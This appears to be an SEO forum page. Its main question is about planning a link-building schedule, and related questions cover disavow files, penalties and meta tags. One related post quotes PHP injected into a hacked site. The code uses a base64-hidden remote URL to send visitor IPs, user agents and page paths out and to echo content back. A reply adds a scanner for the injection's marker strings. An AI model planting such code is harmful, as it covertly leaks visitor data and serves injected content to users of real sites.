Can you suggest a good plan for a link-building chart for a small static website?
-
Hi everyone, can anyone suggest a clear approach for an off-page link-building chart? Ours is a 24-page website, and we would like to plan off-page activities such as bookmarking, classifieds, directories and so on. How many links are we supposed to post, and with how many days between batches? For example: 15 bookmarking links, 10 classified links, one article submission per week, and after one week the same cycle repeats...
-
There is no magic number or frequency of links that will secure you good, long-term rankings. Richard is right: you shouldn't treat link building as a painting-by-numbers game where you decide on a number of links from one type of source and fill those numbers into a chart as the links are built.
Check out the link building category on the Moz blog. It contains years' worth of high-quality content about creative, sustainable link development ideas.
Please keep in mind that "social bookmarking" is a very outdated technique. Depending on what you actually plan on doing, a lot of these links may be nofollowed as well, making their usefulness for SEO purposes negligible.
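For context, a "nofollowed" link is simply one whose anchor tag carries a rel="nofollow" attribute, which asks search engines not to pass ranking credit through it. A minimal illustration (the URL is hypothetical):

    <a href="http://example.com/your-page" rel="nofollow">Your page</a>

Bookmarking and profile sites commonly add this attribute automatically, which is why links from them tend to carry little SEO value.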
-
The secret is to get a googol links. Seriously though: quality over quantity. Try to get links in your niche. If you're a home builder, get links from home-builder directories, not general directories; if you serve a particular location, look for those city directories and get local citations. Each industry is different, so check out the links that your competitors (and competitors in other markets) have for ideas. You could spend a lot of time worrying about 15 bookmarking links, 10 classified links, an article, or some other magic number, but I'd take one link from a relevant, authoritative website over all of that.
Related Questions
-
4 websites - meta titles and descriptions
I manage four separate websites/brands that all focus on the same topics and have the same architecture. I am trying to improve each site's meta titles and descriptions, page by page, which I inherited from my predecessor. My question is: how different should each title/description be from the others for the same page type? Do the search engines weigh this heavily when deciding who to show on the SERPs? Am I able to simply swap out the brand name in the metas and call it done, or should each meta be unique? If unique, how unique? As you can imagine, since each page is essentially the same, with the same overall content and layout targeting the same keywords, it is very difficult to rewrite the metas in four unique ways. I greatly appreciate any advice on how you would approach this project.
White Hat / Black Hat SEO | dsinger
-
How to re-rank an established website with new content
I can't help but feel this is a somewhat untapped topic with a distinct lack of information.
White Hat / Black Hat SEO | ChimplyWebGroup
There is a massive amount of information around on how to rank a new website, or on techniques to increase SEO effectiveness, but how to rank a whole new set of pages, or indeed to 'rebuild' a site that may have suffered an algorithmic penalty, is a harder nut to crack in terms of information and resources. To start, I'll describe my situation: SuperTED is an entertainment directory SEO project.
It seems likely we suffered an algorithmic penalty at some point around Penguin 2.0 (May 22nd), as traffic dropped steadily from then on, though not too aggressively. Then, to coincide with the newest Panda update (Panda 27, according to Moz) in late September this year, we decided it was time to reassess our tactics to keep in line with Google's guidelines. We've slowly built a natural link profile over the last two years, but it's likely thin content was also an issue. So from the beginning of September to the end of October we took these steps:
- Contacted webmasters to remove links (unfortunately there was some 'paid' link building before I arrived).
- Disavowed the rest of the unnatural links that we couldn't get removed manually.
- Worked on page speed as per Google's guidelines until we received high scores in the majority of speed-testing tools (e.g. WebPageTest).
- Redesigned the entire site with speed, simplicity and accessibility in mind.
- Used .htaccess rewrites to remove file extensions from the 'fancy' URLs and simplify the link structure.
- Completely removed two or three pages that were quite clearly just trying to 'trick' Google - think a large page of links that simply said 'Entertainers in London', 'Entertainers in Scotland', etc. We 404'ed them and asked for URL removal via WMT; we're thinking of 410'ing them?
- Added new content and pages that seem to follow Google's guidelines as far as I can tell, e.g. main category pages and sub-category pages.
- Started to build new links to our now 'content-driven' pages naturally by asking our members to link to us via their personal profiles. We offered an internal reward system for this, so we've seen a fairly good turnout.
- Addressed many other 'possible' ranking factors: adding Schema data, optimising for mobile devices as best we can, adding a blog and beginning to blog original content, expanding our social media reach, building custom 404 pages, removing duplicate content, using Moz, and much more.
It's been a fairly exhaustive process, but we were happy to do it to stay within Google's guidelines. Unfortunately, some of those link-wheel pages mentioned previously were the only pages driving organic traffic, so once we were rid of them, traffic dropped to not even 10% of what it was previously. Equally, with the changes (.htaccess) to the link structure and the creation of brand-new pages, we've lost many of the pages that previously held Page Authority.
We've 301'ed the pages that were 'replaced' with much better content and a different URL structure - http://www.superted.com/profiles.php/bands-musicians/wedding-bands to simply http://www.superted.com/profiles.php/wedding-bands, for example (see the sketch below). Therefore, with the loss of the 'spammy' pages and the creation of brand-new 'content-driven' pages, we've probably lost up to 75% of the old website, including the pages that were driving any traffic at all (even with potential thin-content algorithmic penalties). Because of the loss of entire pages, the changed URLs and the rest discussed above, the site probably looks very new and very heavily updated over a short period of time. What I need to work out is a campaign to drive traffic to the 'new' site.
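For what it's worth, here is a minimal sketch of the status-code handling described above, assuming requests to the old URLs still reach a PHP entry point; the array contents are hypothetical apart from the wedding-bands example, and doing this in PHP rather than with .htaccess rules is just an implementation choice:

    <?php
    // Map replaced URLs to their new homes; a 301 passes most of the old equity.
    $redirects = [
        '/profiles.php/bands-musicians/wedding-bands' => '/profiles.php/wedding-bands',
    ];
    // Removed 'link wheel' pages; the path here is a placeholder.
    $gone = [
        '/entertainers-in-london.php',
    ];

    $path = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);

    if (isset($redirects[$path])) {
        // Permanent redirect for pages replaced by better content.
        header('Location: http://www.superted.com' . $redirects[$path], true, 301);
        exit;
    }
    if (in_array($path, $gone, true)) {
        // 410 signals the page is gone for good; crawlers typically drop
        // a 410 from the index faster than a 404.
        header('HTTP/1.1 410 Gone');
        exit;
    }

The same effect can be achieved with mod_alias or mod_rewrite rules in .htaccess if you'd rather keep it out of application code.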
We're naturally building links through our own customer base, so those should be seen as quality, natural links.
Perhaps the sudden appearance of a large number of 404s and 'lost' pages is affecting us?
Perhaps we're yet to be properly re-indexed; it has been almost a month since most of the changes were made, and we'd often be re-indexed three or four times a week before the changes.
Our events page is the only one left to update with the new design - could this be affecting us? It may look like two sites in one.
Perhaps we need to wait until the next Google 'link' update to feel the benefits of our link audit.
Perhaps simply getting rid of many of the 'spammy' links has done us no favours - I should point out we've never been issued with a manual penalty. Was I perhaps too hasty in following the rules? I'd appreciate a professional opinion, or input from anyone who has experience of a similar process. It does seem fairly odd that following guidelines and general white-hat SEO advice could cripple a domain, especially an established one (the domain is 10+ years old) with relatively good domain authority within the industry. Many, many thanks in advance. Ryan.
-
Website has been hacked - will this hurt ranking?
Today we found out that a website of ours has been hacked and that this code was put into multiple index.php files:

    if (!isset($sRetry))
    {
        global $sRetry;
        $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        if ((strstr($sUserAgent, 'google') == false) && (strstr($sUserAgent, 'yahoo') == false) && (strstr($sUserAgent, 'baidu') == false) && (strstr($sUserAgent, 'msn') == false) && (strstr($sUserAgent, 'opera') == false) && (strstr($sUserAgent, 'chrome') == false) && (strstr($sUserAgent, 'bing') == false) && (strstr($sUserAgent, 'safari') == false) && (strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) { // Create bot analitics
                $stCurlLink = base64_decode('aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw') . '?ip=' . urlencode($_SERVER['REMOTE_ADDR']) . '&useragent=' . urlencode($sUserAgent) . '&domainname=' . urlencode($_SERVER['HTTP_HOST']) . '&fullpath=' . urlencode($_SERVER['REQUEST_URI']) . '&check=' . isset($_GET['look']);
                @$stCurlHandle = curl_init($stCurlLink);
            }
        }
        if ($stCurlHandle !== NULL)
        {
            curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
            $sResult = @curl_exec($stCurlHandle);
            if ($sResult[0] == "O")
            {
                $sResult[0] = " ";
                echo $sResult; // Statistic code end
            }
            curl_close($stCurlHandle);
        }
    }
    ?>

After some searching I found other people mentioning this problem too. They were also saying that it could have an impact on your search rankings. My first question: will this hurt my rankings? Second question: is there something I can do to tell the search engines about the hack so that we don't lose ranking because of it? Grtz, Ard
White Hat / Black Hat SEO | GTGshops
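In case it helps anyone hit by the same injection: the snippet checks the visitor's user agent and, for agents matching none of the listed browsers and bots, quietly requests and echoes whatever a remote server (hidden in the base64 string) returns. That is classic cloaking/injection behaviour, which certainly can hurt rankings if Google catches the site serving spam. Below is a minimal clean-up aid, sketched under the assumption of a standard document root; the marker strings are copied verbatim from the injected code:

    <?php
    // Recursively scan a document root for files containing telltale strings
    // from the injection above, so infected files can be located and cleaned.
    $root    = '/var/www/html'; // assumption: adjust to your own docroot
    $markers = ['$sRetry', 'aHR0cDovL21icm93c2Vyc3Rh']; // strings from the injected code

    $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root));
    foreach ($files as $file) {
        if (!$file->isFile() || $file->getExtension() !== 'php') {
            continue;
        }
        $source = file_get_contents($file->getPathname());
        foreach ($markers as $marker) {
            if (strpos($source, $marker) !== false) {
                echo $file->getPathname() . " contains '" . $marker . "'\n";
                break;
            }
        }
    }

After cleaning, requesting a review (or using Fetch as Google) in Webmaster Tools is the usual way to tell the search engines the hack has been fixed.
-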
Link "Building" or "Earning" Which one are you doing? Both?
I'm curious to see how SEOs interpret this section of the Google Webmaster Guidelines on link schemes: "The best way to get other sites to create high-quality, relevant links to yours is to create unique, relevant content that can naturally gain popularity in the Internet community. Creating good content pays off: Links are usually editorial votes given by choice, and the more useful content you have, the greater the chances someone else will find that content valuable to their readers and link to it." (Source: https://support.google.com/webmasters/answer/66356?hl=en) I'm not asking what you "should" do, but rather what YOU actually do... Do you interpret this as: create awesome content and the links will come? Create awesome content and do a bit of outreach? Perhaps you don't follow it at all and concentrate on building links over content? What do you do, and why? Discuss!
White Hat / Black Hat SEO | BrettDixon
-
Strange Pingback/Blog Comment Links
On one of my sites I've noticed some strange links in Google Webmaster Tools' recent-links feature. They are pingbacks/blog comments, but they use keyword anchor text and link to my site. I know we are not doing this. Should I be concerned that this may be negative SEO? Here's a sample (be careful, shady site)
White Hat / Black Hat SEO | eyeflow
-
Can I send a disavow if I detect a spam link?
I have detected that one web domain is generating 2,400 links to my site. Should I use the disavow tool, as it is impossible to contact the webmaster and there has been no response to my emails? My site has not been warned or penalized, but I don't like these links and I want to inform Google about them. If Google accepts the disavow file, will I still see those links in my Webmaster Tools, or will they disappear? Thanks
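For reference, the disavow file Google expects is a plain text file uploaded through the Disavow Links tool, one entry per line; the domain below is a placeholder, not a recommendation:

    # Lines starting with # are comments and are ignored by Google.
    # Disavow every link from an entire domain:
    domain:spammy-directory-example.com
    # Or disavow a single linking page:
    http://spammy-directory-example.com/some-page.html

Webmaster Tools will generally keep reporting the links either way; the disavow file only asks Google to ignore them when assessing your site.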
White Hat / Black Hat SEO | maestrosonrisas
-
One domain generating too many links - what to do?
I think Penguin has had no effect in Spain yet; propdental.com remains the same, and propdental.es is still growing. No Penguin 2.0 effect. I think it will take a few more days to see if there is an impact in Spain.
White Hat / Black Hat SEO | maestrosonrisas
Although I have a question regarding CognitiveSEO (it concerns a link to propdental.es from unidirectorio.com). I think it is a good site, but it has generated a very large number of links: one link from unidirectorio.com has produced 2,400 links to www.propdental.es with the anchor text "clinica dental con dentistas especialistas en implantes dentales ortodoncia invisalign y carillas". The links come from this page, http://undirectorio.com/Salud/dentistas/, and from there multiply into 2,400. I cannot remove this link. It seemed a good directory, with just three pages linking out and good PageRank in my specific field. I asked Google not to take that link into account, although I am not sure I did it correctly. Can someone tell me how to tell Google not to take the links from a domain into account? Google still shows these links in Webmaster Tools, and I am afraid this will end up being bad. It seems a good directory, and it is not an exact anchor-text match, although it contains all the words I want to rank for. What would be your advice? Do I have any way to make sure that Google does not take the links received from that domain into account?
-
Anchor text for internal links
There has been a lot of discussion on this forum and elsewhere about over-optimized anchor text, partial-match vs. exact-match anchor text, etc. I am wondering whether exact anchor-text matches are good or bad for internal links. Does anyone have any thoughts, or better, any studies? Paul
White Hat / Black Hat SEO | diogenes